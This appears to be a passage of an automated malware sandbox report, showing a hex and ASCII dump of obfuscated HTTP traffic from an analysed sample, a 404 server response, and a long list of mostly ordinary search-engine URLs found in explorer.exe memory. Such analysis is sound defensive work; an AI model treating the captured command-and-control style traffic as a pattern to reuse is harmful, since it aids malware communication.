59 4f 69 4b 65 74 47 5a 6a 42 76 50 6a 58 41 69 44 78 6b 51 66 73 76 41 7a 51 67 41 52 36 48 64 43 50 4a 76 61 30 5a 66 62 31 53 64 67 28 35 70 30 28 50 74 6a 47 7a 78 43 31 32 63 50 34 61 45 30 28 6d 52 7a 52 51 30 4b 6e 6d 70 5f 76 58 69 50 77 5f 42 34 36 64 4d 52 36 5a 72 2d 33 69 7a 6e 4d 64 70 5f 6d 67 28 75 4c 53 51 41 55 44 38 75 4b 53 77 4b 37 63 4a 41 32 68 30 35 63 64 73 44 42 31 38 30 54 71 73 73 7a 65 63 78 73 62 38 4e 63 4f 64 59 47 67 74 41 41 6a 6f 50 71 32 61 73 48 59 28 35 4f 44 41 49 6b 35 5a 7a 71 30 4a 30 78 66 58 36 7a 37 48 39 72 6c 61 35 46 51 56 5f 58 73 73 79 32 61 78 47 72 62 54 6f 43 38 42 72 43 41 39 6b 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 0L3HBdm=dAsm3DP1gNKLbvMqihDy~OGYt2DSaQTY9WJ3qTIDGgnfwY36STW6xhkGa_MBsXrVJWCPhlG3nzeOjOizxghm4jNHxf61SYJS1-GHqkB2N9PiDXErRvYZVTZt818JWmH3PkhL516dmTIjo2tdUSSMmiIB(yhUn9OpOckmIVwCWF2WNrv3C7S6AmMqA_FYOiKetGZjBvPjXAiDxkQfsvAzQgAR6HdCPJva0Zfb1Sdg(5p0(PtjGzxC12cP4aE0(mRzRQ0Knmp_vXiPw_B46dMR6Zr-3iznMdp_mg(uLSQAUD8uKSwK7cJA2h05cdsDB180Tqsszecxsb8NcOdYGgtAAjoPq2asHY(5ODAIk5Zzq0J0xfX6z7H9rla5FQV_Xssy2axGrbToC8BrCA9kBg).
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 31 Jul 2020 19:29:22 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 71 33 78 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /aq3x/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1294009736.0000000007EC1000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000001.00000000.1301648411.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000001.00000000.1302140897.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000001.00000000.1288482274.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000001.00000000.1302352467.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
